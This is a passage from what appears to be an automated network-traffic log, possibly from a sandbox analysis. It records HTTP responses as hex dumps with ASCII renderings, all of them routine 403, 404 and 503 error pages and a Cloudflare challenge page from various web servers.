6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:48 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Thu, 27 Jul 2023 19:53:49 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487630.39623753218116848X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:53:50 GMTX-Served-By: cache-lin2290028-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIKJzgdMgoqUEKajl71dlidW,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:50 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: f26ac300-6096-4562-808b-d3c222c91bacCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yFTLlImYAW9dpbqOKYIAg%2FkuAWa7IAPqUTkmlKblX6aNddWS%2FVk5FkGPqvTvm996otprK1IlyGguiqMajE6EsXGb0BNemdCFmehwfdBOfYgBihimXZOqGED4yzBF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=171.999931Server: cloudflareCF-RAY: 7ed76e4edad339c4-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:51 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:53:52 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:54:07 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uCvD7nwC2FKKwagwYmuWJgT2ZRieSFnGqgdmjH14aubt%2FBd4HfxnZNSRUl91R3f1GtgB%2FbybOKF1044WrJoKDJqCd8wlyBhJJXHhCAQsVvn3VCPd5lHzREZQZRwO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e57782f9960-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta h
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:52 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
